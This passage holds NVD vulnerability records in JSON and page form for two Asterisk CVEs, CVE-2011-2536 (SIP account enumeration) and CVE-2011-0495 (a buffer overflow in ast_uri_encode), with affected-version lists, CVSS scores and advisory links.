              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB7D2048-CD61-46C0-830B-11976B275783",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:*:*:*:*:*:*:*",
              "matchCriteriaId": "8DBA63FE-62AF-4F3D-B30C-550D17C4E35F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AD0A0F19-020D-4578-9023-12B0CB646D9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "96D5A1E3-FF0B-4C71-AA51-655D7106880D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:*:*:*:*:*:*:*",
              "matchCriteriaId": "E5D425E6-E2E5-4452-9EAA-2697C1155784",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9855FA26-0930-4AC9-A920-B394F6916349",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BBA21246-7DF4-41BC-998A-05D38FC97C8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EE9A7984-22C9-4296-8E44-C010E67F193D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "51B2C42A-C252-4BD8-A908-8F30C2BF15E7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "2137CEAD-0F19-43C5-A26D-1972564FCD8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "B7552466-B782-4F16-8561-A2A51E94FED4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C2F8C82D-3031-4C62-89FA-3BF56EA29727",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3074CEA-46BD-4CAD-BF5C-10008A80E434",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6AB8988-FCC6-407A-A7D9-2F7A3A7488B1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:*:*:*:*:*:*:*",
              "matchCriteriaId": "E06848DE-6EE1-4FD0-A14F-39D41B2F3E75",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CF342950-FDD7-41A9-94D5-EDF41130B61E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6E4543AA-3D54-4444-AD1F-381A87A89DA2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "AF3036DD-261C-4975-A01E-92CD29479588",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "EF07C116-27DC-4875-9DCF-049E2A8EAEA4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "88FBC328-538A-4484-A342-1688D9669B9F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CBF2301E-F6EF-4D28-82EE-FA1AB8CA9E43",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.28:*:*:*:*:*:*:*",
              "matchCriteriaId": "A53F637C-846A-43FC-BA71-C8571648FA46",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.28:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "E61070F4-1B6B-4814-918E-459DE5119A24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29:*:*:*:*:*:*:*",
              "matchCriteriaId": "70664E0F-09CF-42C2-A7A7-E635D022E90D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D1E13E1A-C2D4-4E5A-84C8-E6AF061D67C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7E811134-B657-4C50-9AEF-A7F68CA5577A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:*:*:*:*:*:*:*",
              "matchCriteriaId": "4C4CD101-F079-4940-AA79-886B69A7A514",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B7B828E9-5BE3-4E6F-8048-F2B1F2E929CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "75BB2066-74A6-4F89-B54C-35F234DC1F03",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "FE522334-BF53-4E34-949B-CD928B59A341",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "648DEC0E-3CBC-4EA2-AF27-2C518B0762CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B50F4BAE-D00D-4352-B52B-BE1A9FFB6949",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "E7A35508-8235-4915-8810-12B2630C82C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.32:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "63DD4EE5-6F56-41C7-9CB4-16ADF4F63B8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:*:*:*:*:*:*:*",
              "matchCriteriaId": "2347E451-2F89-4EA6-A6E0-22BCB0C8A56E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A86F5360-6FE4-4EA2-9208-076E78C842A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "3CDFA85B-17A4-4ECC-9922-F5546917B4C0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3D7D7DB7-32A7-490E-AED2-C404D371E7C2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:*:*:*:*:*:*:*",
              "matchCriteriaId": "A03632BC-CA0F-42BD-8839-A72DB146A4A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9DC4EF64-6A1D-47CB-AC07-48CABB612DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "68C00FEF-7850-48F4-8122-4211D080B508",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.35:*:*:*:*:*:*:*",
              "matchCriteriaId": "D3A48F07-42E1-47E9-94EA-44D20A0BAC3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.35:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D16470-5892-4289-BB35-B69100BCA31E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.36:*:*:*:*:*:*:*",
              "matchCriteriaId": "15E71BD7-83D1-4E2B-AD40-BB6B53056C89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.36:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FDE2E2-5F08-43EF-BBD8-7DCCC0C98870",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.37:*:*:*:*:*:*:*",
              "matchCriteriaId": "347E9D8C-A372-41F2-AB48-FFCAB454C9C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.37:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "74F67E57-1DD0-4850-8D7E-7A9748BD106C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.38:*:*:*:*:*:*:*",
              "matchCriteriaId": "B208C056-B567-4BEE-A9B7-AEB394341D5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.38:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A0C3A2D4-07A9-4D28-AC18-03523E9FF34A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6516E0F-9F60-4D20-88D3-B9CD8DC93062",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "22147B91-45A4-4834-AC8D-2DC17A706BEF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "677C10DE-46D8-4EF1-BF22-63F3AE37CBC2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E299CE20-B02D-4519-AC46-BB64B1E3826A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:*:*:*:*:*:*:*",
              "matchCriteriaId": "22FD16C3-7518-4208-8C0A-043C13C14A72",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2461B6B9-2C93-4D84-A1EE-C07AD32A9540",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C8A4CE2D-FBAB-4C35-846A-5B95BBCAD6BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "30FFB6F4-1BC7-4D4C-9C65-A66CF514E321",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "F745AF0A-D6A6-4429-BBBE-347BF41999BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "DC44F61B-AB96-4643-899B-19B9E3B4F05C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.41:*:*:*:*:*:*:*",
              "matchCriteriaId": "F788A255-CF21-424F-9F30-8A744CC16740",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.41:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "92B8AA8E-D49B-4AD7-8AFC-BD4F9E9C7A16",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.41.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "0606F179-8817-4124-B92B-CD868B216320",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "78E8936C-033B-49E6-BB39-D5BBBC80EB55",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.1.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "5D05D04F-CD6C-4A73-885C-306D7A5CC7C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.1.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "3805B5F3-A4CD-469F-9F8A-A271A79A2B7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.2.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "9FAEBE5E-378A-40DC-B2B9-31F6D1305BCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.2.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "617B3FE8-39E3-41C0-9348-9507DA43DE93",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.3.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "04AB4C82-71BB-49B7-B4F3-4E75EFB5F1A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.6.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "78B55176-E269-411B-974A-B5D2CE8E08C2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.6.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "9BCF12B0-4B8D-499D-B5DE-FB0CD9EEC3B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.6.4:-:business:*:*:*:*:*",
              "matchCriteriaId": "9ED68059-F0E5-4B1B-B633-466D92F38346",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "chan_sip.c in the SIP channel driver in Asterisk Open Source 1.4.x before 1.4.41.2, 1.6.2.x before 1.6.2.18.2, and 1.8.x before 1.8.4.4, and Asterisk Business Edition C.3.x before C.3.7.3, disregards the alwaysauthreject option and generates different responses for invalid SIP requests depending on whether the user account exists, which allows remote attackers to enumerate account names via a series of requests."
    },
    {
      "lang": "es",
      "value": "chan_sip.c en el controlador de canal SIP en Asterisk Open Source v1.4.x anteriores a v1.4.41.2, v1.6.2.x anteriores a v1.6.2.18.2, y v1.8.x anteriores a v1.8.4.4, y Asterisk Business Edition vC.3.x anteriores a vC.3.7.3,no tiene en cuenta la opci\u00f3n alwaysauthreject y genera diferentes respuestas no v\u00e1lidas para solicitudes SIP en funci\u00f3n de si la cuenta de usuario existe, lo que permite a atacantes remotos enumerar los nombres de cuenta a trav\u00e9s de una serie de peticiones."
    }
  ],
  "id": "CVE-2011-2536",
  "lastModified": "2024-11-21T01:28:29.493",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2011-07-06T19:55:03.543",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-011-1.8.diff"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-011.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id?1025734"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-011-1.8.diff"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-011.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1025734"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2011-01-20 19:00

Modified

2024-11-21 01:24

Severity ?

Summary

Stack-based buffer overflow in the ast_uri_encode function in main/utils.c in Asterisk Open Source before 1.4.38.1, 1.4.39.1, 1.6.1.21, 1.6.2.15.1, 1.6.2.16.1, 1.8.1.2, 1.8.2.; and Business Edition before C.3.6.2; when running in pedantic mode allows remote authenticated users to execute arbitrary code via crafted caller ID data in vectors involving the (1) SIP channel driver, (2) URIENCODE dialplan function, or (3) AGI dialplan function.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2011-001-1.6.2.diff	Patch, Vendor Advisory
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2011-001.html	Vendor Advisory
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053689.html	Third Party Advisory
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053713.html	Third Party Advisory
cve@mitre.org	http://osvdb.org/70518	Broken Link
cve@mitre.org	http://secunia.com/advisories/42935	Third Party Advisory
cve@mitre.org	http://secunia.com/advisories/43119	Third Party Advisory
cve@mitre.org	http://secunia.com/advisories/43373	Third Party Advisory
cve@mitre.org	http://www.debian.org/security/2011/dsa-2171	Third Party Advisory
cve@mitre.org	http://www.securityfocus.com/archive/1/515781/100/0/threaded	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securityfocus.com/bid/45839	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.vupen.com/english/advisories/2011/0159	Permissions Required
cve@mitre.org	http://www.vupen.com/english/advisories/2011/0281	Permissions Required
cve@mitre.org	http://www.vupen.com/english/advisories/2011/0449	Permissions Required
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/64831	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2011-001-1.6.2.diff	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2011-001.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053689.html	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053713.html	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/70518	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/42935	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/43119	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/43373	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2011/dsa-2171	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/515781/100/0/threaded	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/45839	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2011/0159	Permissions Required
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2011/0281	Permissions Required
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2011/0449	Permissions Required
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/64831	Third Party Advisory, VDB Entry

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	asterisknow	1.5
fedoraproject	fedora	13
fedoraproject	fedora	14
debian	debian_linux	6.0
digium	s800i_firmware	1.2.0
digium	s800i	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:business:*:*:*",
              "matchCriteriaId": "FA6C77B1-85FF-47C1-8E1F-CABFF1DEA5FE",
              "versionEndExcluding": "c.3.6.2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "4CF68F51-2011-4CEE-A4EA-49A59E440BAA",
              "versionEndIncluding": "1.2.40",
              "versionStartIncluding": "1.2.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F0CCB255-0F1A-4FBE-A04D-A9560D3DF3BE",
              "versionEndExcluding": "1.4.38.1",
              "versionStartIncluding": "1.4.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F3CEB89D-1D84-4B8E-B476-E00726752766",
              "versionEndExcluding": "1.4.39.1",
              "versionStartIncluding": "1.4.39",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "C0F92DAC-5736-49A6-9C52-2330BC4B724B",
              "versionEndExcluding": "1.6.1.21",
              "versionStartIncluding": "1.6.1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "71755241-9AF8-43EE-BD9F-9FF4DFD808D4",
              "versionEndExcluding": "1.6.2.15.1",
              "versionStartIncluding": "1.6.2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "007C363A-CBC6-4A05-BD3E-74A5A530B281",
              "versionEndExcluding": "1.6.2.16.1",
              "versionStartIncluding": "1.6.2.16",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "35488043-2E09-4286-A178-4A25AA5C364F",
              "versionEndExcluding": "1.8.1.2",
              "versionStartIncluding": "1.8.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "AADFA817-D1C7-49D2-AE6D-55493145BAFF",
              "versionEndExcluding": "1.8.2.2",
              "versionStartIncluding": "1.8.2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisknow:1.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF81215F-0DD3-48FC-BA1C-19E42FCD47B5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:fedoraproject:fedora:13:*:*:*:*:*:*:*",
              "matchCriteriaId": "A2D59BD0-43DE-4E58-A057-640AB98359A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:fedoraproject:fedora:14:*:*:*:*:*:*:*",
              "matchCriteriaId": "BDE52846-24EC-4068-B788-EC7F915FFF11",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "036E8A89-7A16-411F-9D31-676313BB7244",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:digium:s800i_firmware:1.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8AA18EB6-92D5-4B01-A4BC-2B7177D28C40",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:digium:s800i:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "15C35F93-0E57-4AEB-AA5F-4EDFAE753451",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Stack-based buffer overflow in the ast_uri_encode function in main/utils.c in Asterisk Open Source before 1.4.38.1, 1.4.39.1, 1.6.1.21, 1.6.2.15.1, 1.6.2.16.1, 1.8.1.2, 1.8.2.; and Business Edition before C.3.6.2; when running in pedantic mode allows remote authenticated users to execute arbitrary code via crafted caller ID data in vectors involving the (1) SIP channel driver, (2) URIENCODE dialplan function, or (3) AGI dialplan function."
    },
    {
      "lang": "es",
      "value": "Desbordamiento de b\u00fafer basado en pila en la funci\u00f3n ast_uri_encode, en main/utils.c, en Asterisk Open Source before v.1.4.38.1, v.1.4.39.1, v.1.6.1.21, v.1.6.2.15.1, v.1.6.2.16.1, v.1.8.1.2, v.1.8.2.; y Business Edition before v.C.3.6.2; cuando se ejecuta en modo \"pedantic\" permite a usuarios autenticados ejectuar c\u00f3digo de su elecci\u00f3n manipulados con el dato llamador ID en vectores que involucran el (1) el driver del SIP, (2) la funci\u00f3n URIENCODE dialplan, o la funci\u00f3n AGI dialplan."
    }
  ],
  "id": "CVE-2011-0495",
  "lastModified": "2024-11-21T01:24:08.320",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2011-01-20T19:00:08.600",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-001-1.6.2.diff"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-001.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053689.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053713.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link"
      ],
      "url": "http://osvdb.org/70518"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/42935"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/43119"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/43373"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://www.debian.org/security/2011/dsa-2171"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/archive/1/515781/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/45839"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Permissions Required"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/0159"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Permissions Required"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/0281"
    },
